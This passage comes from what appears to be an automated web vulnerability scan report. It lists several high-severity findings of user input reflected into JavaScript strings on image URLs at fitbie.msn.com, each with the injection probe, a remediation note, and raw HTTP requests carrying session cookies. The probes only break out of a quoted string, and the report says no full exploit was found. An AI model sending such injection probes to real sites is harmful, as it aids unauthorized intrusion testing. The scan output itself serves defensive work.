s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:30:03 +0000
ETag: "1297607403-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:30:04 GMT
Date: Sun, 13 Feb 2011 14:30:04 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaulta767d';87fcf881513?destination=node%2Fdefaulta767d';87fcf881513&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.107. http://fitbie.msn.com/sites/default/files/stk156319rke-th_0.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/stk156319rke-th_0.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3afc'%3b46d7e1e4aa7 was submitted in the REST URL parameter 2. This input was echoed as a3afc';46d7e1e4aa7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/defaulta3afc'%3b46d7e1e4aa7/files/stk156319rke-th_0.jpg?1290563032 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/fat-burning-workouts
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:31 +0000
ETag: "1297607371-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:32 GMT
Date: Sun, 13 Feb 2011 14:29:32 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaulta3afc';46d7e1e4aa7?destination=node%2Fdefaulta3afc';46d7e1e4aa7&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.108. http://fitbie.msn.com/sites/default/files/subway-commute-safety-th_0.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/subway-commute-safety-th_0.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f62c'%3b2c774a12d7f was submitted in the REST URL parameter 2. This input was echoed as 8f62c';2c774a12d7f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/default8f62c'%3b2c774a12d7f/files/subway-commute-safety-th_0.jpg?1297468386 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:09 +0000
ETag: "1297607169-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:09 GMT
Date: Sun, 13 Feb 2011 14:26:09 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default8f62c';2c774a12d7f?destination=node%2Fdefault8f62c';2c774a12d7f&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.109. http://fitbie.msn.com/sites/default/files/success-after-combo-th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/success-after-combo-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7dd6f'%3bec90b3e4ce9 was submitted in the REST URL parameter 2. This input was echoed as 7dd6f';ec90b3e4ce9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/default7dd6f'%3bec90b3e4ce9/files/success-after-combo-th.jpg?1294844837 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:49 +0000
ETag: "1297607389-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:49 GMT
Date: Sun, 13 Feb 2011 14:29:49 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49315

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default7dd6f';ec90b3e4ce9?destination=node%2Fdefault7dd6f';ec90b3e4ce9&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.110. http://fitbie.msn.com/sites/default/files/thrust_B-female-th_1.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/thrust_B-female-th_1.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab0d2'%3b40aed4c0f49 was submitted in the REST URL parameter 2. This input was echoed as ab0d2';40aed4c0f49 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/defaultab0d2'%3b40aed4c0f49/files/thrust_B-female-th_1.jpg?1294861910 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:53 +0000
ETag: "1297607393-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:54 GMT
Date: Sun, 13 Feb 2011 14:29:54 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultab0d2';40aed4c0f49?destination=node%2Fdefaultab0d2';40aed4c0f49&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.111. http://fitbie.msn.com/sites/default/files/walk_off_weight_th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/walk_off_weight_th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4e39'%3b6f6f8646d33 was submitted in the REST URL parameter 2. This input was echoed as f4e39';6f6f8646d33 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/defaultf4e39'%3b6f6f8646d33/files/walk_off_weight_th.jpg?1286494459 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:44 +0000
ETag: "1297607204-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:45 GMT
Date: Sun, 13 Feb 2011 14:26:45 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49299

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultf4e39';6f6f8646d33?destination=node%2Fdefaultf4e39';6f6f8646d33&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.112. http://fitbie.msn.com/sites/default/files/wh_personal_trainer_th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/wh_personal_trainer_th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 213fc'%3b9f9a992db5e was submitted in the REST URL parameter 2. This input was echoed as 213fc';9f9a992db5e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/default213fc'%3b9f9a992db5e/files/wh_personal_trainer_th.jpg?1286309296 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:30:04 +0000
ETag: "1297607404-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:30:05 GMT
Date: Sun, 13 Feb 2011 14:30:05 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49315

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default213fc';9f9a992db5e?destination=node%2Fdefault213fc';9f9a992db5e&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.113. http://fitbie.msn.com/sites/default/files/win-the-war-on-fat-th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/win-the-war-on-fat-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14ef8'%3be86b01acd7a was submitted in the REST URL parameter 2. This input was echoed as 14ef8';e86b01acd7a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/default14ef8'%3be86b01acd7a/files/win-the-war-on-fat-th.jpg?1287692880 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; 